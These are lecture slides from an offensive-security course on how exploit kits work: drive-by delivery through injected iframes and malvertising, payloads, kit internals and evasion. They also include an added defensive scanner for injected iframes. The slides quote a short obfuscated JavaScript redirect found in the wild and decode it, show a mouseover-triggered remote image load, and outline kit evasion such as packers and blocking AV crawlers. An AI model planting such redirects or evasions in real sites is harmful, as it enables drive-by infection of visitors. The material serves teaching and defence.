Post on 25-Jul-2020
Offensive Technologies, Fall 2016
Lecture 3: Exploit Kit Functionality
Fabio Massacci
26/09/16 Fabio Massacci - Offensive Technologies 1
Remember this scenario?
• Basically that's the same idea of an Exploit Kit
– Execute
• 186 local functions
• 15 functions from external sites
– Aggregate static contents from
• 676 websites, of which
• 370 external websites
• 193 maybe just images
– Aggregate dynamic content from
• 8 advertisers (at least)
– Are all of these actions "good" ones?
• Just instead of adverts it sends you exploits…
Remember this scenario?
• Basically that's the same idea of the exploit served by the exploit kit
– That's a program containing
• at least 1682 instructions
– What happens when we open it?
• All instructions are executed
• Not necessarily true that the result is displayed
– PDF language is Turing complete
• ANY function can be written in PDF language
• Opening a PDF file can seamlessly display an image and simultaneously solve Fermat's little theorem
• So the stuff you got is not a "normal" pdf (or an image etc.): it is something that makes your browser crash and execute some part of the pdf that you don't really want to execute
Ekits: Technological vector
• Reminder of the key idea of all attacks
– System is fed by the attacker with computationally valid code (the exploit) disguised as an input to a vulnerable component
– As a result the code is executed
• The exploit kit scenario is basically one in which
– System → user's computer
– Vulnerable component → browser (or its plug-ins) contacting a web server
– Attacker → web server
– Exploit → some file that the browser normally processes (e.g. text, images, scripts, etc.)
What is an Exploit Kit?
• Essentially it is a website
– When contacted by the user it launches one or more attacks against the website
– If the attacks are successful it infects the system
– Some additional code (payload) is then uploaded onto the system
• Attacks exploit software vulnerabilities
– Browser, plugins, operating systems etc.
– Independently from the vulnerability that is actually exploited, they go through the browser
• There are several of them. Among the most famous
– Blackhole, RIG, Crimepack, Neutrino, BleedingLife, …
Fabio Massacci - Luca Allodi
Attack Delivery Mechanisms
• The user receives the attack just by opening a web page
– The page is not necessarily malicious
– A legitimate page might load, unaware, malicious elements
• An advert that in reality is malicious
• An iFrame inserted by the attacker
• Examples of what you need to do
– Click on a link included in an email
– Click on a video with a catchy title on Facebook
– Open a friend's (or a news site's) web page
– Hover with the mouse over something
• From the user's perspective this is "doing nothing"
Delivery Mechanisms "in the wild"
[Diagram only on the original slide]
Delivery 0 – Status Before Attack
[Diagram: User; Popular website homepage; Hacker/Exploit kit owner; iFrame; Exploit Kit. No links yet.]
Delivery 1 – Compromise Web Site
[Diagram: the Hacker/Exploit kit owner places an iFrame in the popular website homepage; the iFrame points to the Exploit Kit.]
Delivery n.1 – User Connects to Site
[Diagram: the User connects to the popular website homepage, whose iFrame points to the Exploit Kit.]
Delivery n.2 – User Redirected
[Diagram: the iFrame in the homepage points to the Exploit Kit and the User's browser is sent there.]
Delivery n.3 – Exploit Delivered
[Diagram: the Exploit Kit attacks the User; the iFrame still points to the Exploit Kit.]
Can We Block It?
• Do we "break the web" by making this thing impossible?
• Firewall
– Idea: block "content" that arrives from outside and is not requested
– Discussion:
Can't block it…
[Diagram: same as Delivery n.3 (User, Popular website homepage, Hacker/Exploit kit owner, iFrame pointing to the Exploit Kit, Exploit Kit attacking the User), annotated: "This is the original GET request" on the User's connection and "This is the GET response. Can't drop it without breaking the entire web" on the reply.]
How difficult is that?
• Mozilla development web page
– "The mouseover event is fired when a pointing device is moved onto the element that has the listener attached or onto one of its children"
• Code "behind" an image?
<img onmouseover="bigImg(this)" src="http://toughguys.com/belen-b-side.gif" alt="Belen Rodriguez shows her best B-side">
• Enough to add this bit to a page
How difficult is that (contd)
• User perspective on what happened
– Nothing happened
– "There was this cheeky video but I didn't click on it"
• Technical perspective on what happened
– Moving the mouse on a canvas is an action
– Javascript event triggered
– Remote url loaded
– Content of the remote url processed by the browser (or the appropriate plug-in)
• What if the image is not well formed?
– crash the processor and take over control from the browser
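The other side of the "one line in a page is enough" point is that the injected line is also visible to whoever runs the site. The following is an added example, not part of the lecture: a small static scanner a site owner can run over their own pages to flag the two injection patterns discussed above, a hidden off-site iframe and an inline event handler (onmouseover and friends) on an element that loads from a foreign origin. It is regex-based triage, not an HTML parser; the page content, the origin `https://news.example` and the host names in it are constructed for the example.

```javascript
// Added example, not from the lecture: static triage of a page for injected
// hidden iframes and inline event handlers that pull from a foreign origin.
// Regex-based, so it is a triage aid, not an HTML parser. Page is constructed.

const SITE_ORIGIN = 'https://news.example'; // assumed origin of the scanned page

const SAMPLE_PAGE = `
<html><body>
<h1>Daily news</h1>
<img src="/img/banner.png" alt="banner">
<iframe src="/widgets/weather" width="300" height="200"></iframe>
<iframe src="http://ads.example.net/promo" width="0" height="0" style="display:none"></iframe>
<img onmouseover="bigImg(this)" src="http://toughguys.example/belen-b-side.gif" alt="catchy title">
<a href="/about" onmouseover="showTip(this)">About</a>
</body></html>`;

// Opening tags only ('<' followed by a letter); closing tags are skipped.
const TAG_RE = /<([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
// name="value", name='value' or bare name=value
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// True when the URL resolves to an origin other than the page's own.
function isOffsite(url, origin) {
  if (!url) return false;
  try {
    return new URL(url, origin).origin !== new URL(origin).origin;
  } catch (e) {
    return true; // an unparsable URL is flagged rather than ignored
  }
}

// Returns one finding per suspicious construct, in document order.
function scanHtml(html, origin) {
  const findings = [];
  for (const m of html.matchAll(TAG_RE)) {
    const tag = m[1].toLowerCase();
    const attrs = parseAttrs(m[2]);
    const offsite = isOffsite(attrs.src, origin);
    if (tag === 'iframe') {
      const hidden = attrs.width === '0' || attrs.height === '0' ||
        /display\s*:\s*none/i.test(attrs.style || '');
      if (hidden) findings.push({ kind: 'hidden-iframe', tag, src: attrs.src, offsite });
      else if (offsite) findings.push({ kind: 'offsite-iframe', tag, src: attrs.src, offsite });
    }
    for (const name of Object.keys(attrs)) {
      // Any on* attribute is an inline handler; the offsite flag tells the
      // reviewer whether the element it sits on loads from a foreign origin.
      if (name.startsWith('on')) {
        findings.push({ kind: 'inline-handler', tag, attr: name, src: attrs.src, offsite });
      }
    }
  }
  return findings;
}

console.log(scanHtml(SAMPLE_PAGE, SITE_ORIGIN));
```

On the constructed page this reports the zero-size ads iframe, the hovered image that loads from a foreign host, and the same-site handler on the link (reported too, with `offsite: false`, so a reviewer can tell the two apart); the legitimate weather widget is not reported.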
Can We Block It?
• Do we "break the web" by making this thing impossible?
• Browser
– Idea: disable "content" that is not what we explicitly requested
– Discussion:
Attack Vector: Software Vulnerability
• Attack "content" has now been delivered to the system
• "content" is then (mis)interpreted by the receiving software as "code"
– Receiving software has a bug (vulnerability) incorrectly processing "content"
– Bug is exploited (hence the name) so the system executes "content" as if it was "code"
– Receiving system has no way to know this is un-intended
• Typically two types of attack:
– Scripting code (javascript, VBscript, ..) interpreted by the browser
– Malformed files (.swf, .pdf, .applet) loaded by plugin/third party software
Sample of Attack Vectors
[Figure only on the original slide]
Alternative Delivery Mechanism
• Exploit kits work only if they receive connections from victims
– Links, adverts, iframes, redirections, ..
• I can't hack websites: is there an alternative?
• There exist (underground) markets to buy such connections
– "Maladvertising", spam, people reselling their compromise of a legitimate site
– Actually even legit advert networks
• Attacker "buys" 1000 connections from Italian users that use Internet Explorer 7
– Users get redirected to the domain of the attacker when they load the original link
• Requires redirection
Traffic Redirection 0 – Before Attack
[Diagram: User; Popular website homepage with ADs and iFrame; Exploit Kit; Exploit kit owner.]
Traffic Redirection 1 - Acquisition
[Diagram: a Traffic Broker/Hacker appears next to the ADs of the popular website homepage.]
Traffic Redirection 2 – Acquisition II
[Diagram: the Exploit kit owner buys traffic from the Traffic Broker/Hacker.]
Traffic Redirection n.1-4 – User Connects
[Diagram: the User connects to the popular website homepage, is routed through the purchased ADs/iFrame to the Exploit Kit, and the Exploit Kit attacks the User.]
Can We Block It?
• Again, without breaking the web
• Browser redirection
– Idea: we forbid a browser to redirect connections to a different url than the one initially specified
• Discussion
Can't do it
[Diagram: same as Traffic Redirection n.1-4 (User, Popular website homepage with ADs and iFrame, Traffic Broker/Hacker, Exploit kit owner buying traffic, Exploit Kit attacking the User), annotated: "This functionality is built-in on our Web, based on Advertising as a revenue stream".]
Final step: Payload Distribution
• Exploiting a vulnerability only gives control of the user's machine for a brief instant
– By itself this transient control does not yield much value
– We need to make this control more or less permanent
– or deliver to the system something that "has value"
• The exploit kit must deliver a "payload" to the system
– Example: opening a root shell, a request to download and install malware
• The payload is sometimes called shellcode
– Typically run in machine language
– Loaded directly in memory from the attacker
– Executed by the system
Example Payloads
• After the exploit, install ransomware
– Ransomware encrypts the disk and the owner of the software can demand payment to decrypt
– Ransomware does not need to be controlled by the same guy running the exploit kit
• Install a Botnet client
– The botnet client can be re-sold on the market
– The service of the client can be directly sold for "Booter Services"
• Install a Keylogger
– Control the remote machine for possible re-sale of captured credentials (or snitching on your partner)
– For example credit cards can be identified as they are 14 numbers with a number of error correcting codes
Propagation vs operation
• Strategy 1: High propagation rate
– PRO: several infections / unit of time
– AGAINST: The more samples of malware in the wild, the higher the chances to hand a sample to security researchers
• more infections → faster detection
• Strategy 2: Low propagation rate
– PRO:
• higher stealthiness
• fewer chances of infecting a system already infected by another malware
– AGAINST: fewer infections / unit of time
Exploit Kits - Internals
• We now look at Exploit Kits as "software artefacts": how do they look?
– Leaked source codes of 30+ exploit kits
– Vulnerabilities and exploits over 70+ kits
• Offensive Component
– The one responsible for actually delivering the payload to the connecting users
• Defensive Component
– Not just users connect to the website. Security companies do too
– Mostly we want to avoid that the web url hosting the exploit kit is blacklisted
• Management Console
– This is the real purpose of an exploit kit.
Offensive Component
• When the victim sends its first "GET" the kit will
1. Identify the versions of the browser and the operating system (88%)
2. Check the user has not been already infected (64%)
• via IP checking
• This is essential to avoid uncontrolled propagation
3. Check if the system is actually vulnerable
4. Launch a "suitable" attack
• Less sophisticated kits launch attacks even if the system is not vulnerable (36%)
• Others try more than one attack type
Offensive Component: II
• It is enough that one exploit succeeds for the take-over to be successful
• Typically 10-12 exploits per kit
– Recently also exploit kits with 3-5 exploits
– Often not very recent (1-2 years)
• Typical vulnerabilities
– Adobe Flash, Acrobat Reader, Internet Explorer, Java, other plug-ins
Defensive Components
• Exploit kits must actively defend themselves against AV/web robots
• Obfuscation of payload and malware (82%)
– Obfuscation + Crypto
– Malware packers
• Block IP to avoid being sampled by AV/Security (78%)
• Evasions from bots + crawlers (3 kits only)
• Some kits even check in real time whether their url is included in public lists of malware domains.
Defensive Components - II
[Figure only on the original slide]
Defensive Components - III
• AntiVirus software typically recognizes the footprint (signature) of a malware loaded into memory
– Compare the suspicious file and the DB of signatures
– If there is a correspondence, execution is suspended or terminated
• Packers → They are what the name says, "packers" or "wrappers" around the malware that modify its signature
– Main target is "obfuscation of malware"
– "packed malware" → different memory footprint of the downloaded "malware"
• The attacker can also use a "fresh" attack with slightly reduced chances of being detected by the defender.
Content compromise example
• Found on a website to create and publish customised online polls [Provos 2006]
• Obfuscated javascript code
<SCRIPT language=JavaScript>
function otqzyu(nemz){
juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="('";awq27="";sftfttft=4;
fghdh="'ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om'";
dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);
je15="')";
if(vj20+sftfttft==6)eval(juyu+sdfwe78+kjj+uyty+iuiuh8889+vbb25+awq27+dh4+je15);
}
otqzyu();//</SCRIPT>
• Can you deobfuscate it?
– location.replace('http://videozfree.com')
Luca Allodi
Management Console
[Figure only on the original slide]
Gartner's Quadrant for exploit kits
[Figure only on the original slide]
Exploration of a kit: Crimepack
• "Darky" looks
– Mostly because the tool designer wants to sell its usage to other parties
– So it is important to look like a true "professional criminal"
• Actually just a system to manage fragments of web pages, files, and connections
Exploit kit: available attacks
[Screenshot only on the original slide]
Definition and injection of the exploit and the corresponding shellcode
[Screenshot only on the original slide]
Administrative Panel
[Screenshot only on the original slide]
Exploit Selection
[Screenshot only on the original slide]
Key Idea of Exercise
• You connect directly to the exploit kit web-site
– Must set up a virtual machine corresponding to the web server so that it responds to your requests on a specific port
• Must set up the exploit kit site
– Make sure that the web server executes the code of the exploit kit, i.e. that the exploit kit code is run when a request to that port is made (change configuration file)
– Specify the payload (calc.exe) and the exploit
• Launch attack
– Connect to the web server on the specified port
– If the attack works your browser will open a calculator
Delivery n.3 – Exploit Delivered
• What you have to do…
• You just have to do it where
– the user runs on a laptop
– the exploit kit runs on a virtual machine on the laptop
– The code of the exploit kit is available for you to change its source
[Diagram: the Exploit Kit attacks the User; the iFrame points to the Exploit Kit.]
Additional Reading
• On Cybercrime Surveys and Reports
– J. Brito and T. Watkins. Loving the cyber bomb? The dangers of threat inflation in cybersecurity policy. Harvard National Security J., 3(1):39, 2011.
– C. Herley. The plight of the targeted attacker in a world of scale. In Proc. of WEIS'10, 2010.
– R. Wash. Folk models of home computer security. In Proceedings of the Sixth Symposium on Usable Privacy and Security, 2010 Jul 14, p. 11. ACM.
• On Exploit Kits
– C. Grier et al. Manufacturing compromise: the emergence of exploit-as-a-service. In Proc. of ACM CCS'12, pp. 821–832, 2012.
– V. Kotov and F. Massacci. Anatomy of exploit kits. In Proc. of ESSoS'13, pp. 181–196, 2013.
– N. Nikiforakis, F. Maggi, G. Stringhini, M. Z. Rafique, W. Joosen, C. Kruegel, F. Piessens, G. Vigna, and S. Zanero. Stranger danger: Exploring the ecosystem of ad-based url shortening services. In Proc. of WWW'14, pp. 51–62, 2014.
– S. Lekies, B. Stock, and M. Johns. 25 million flows later: Large-scale detection of DOM-based XSS. In Proc. of ACM CCS'13, pp. 1193–1204, 2013.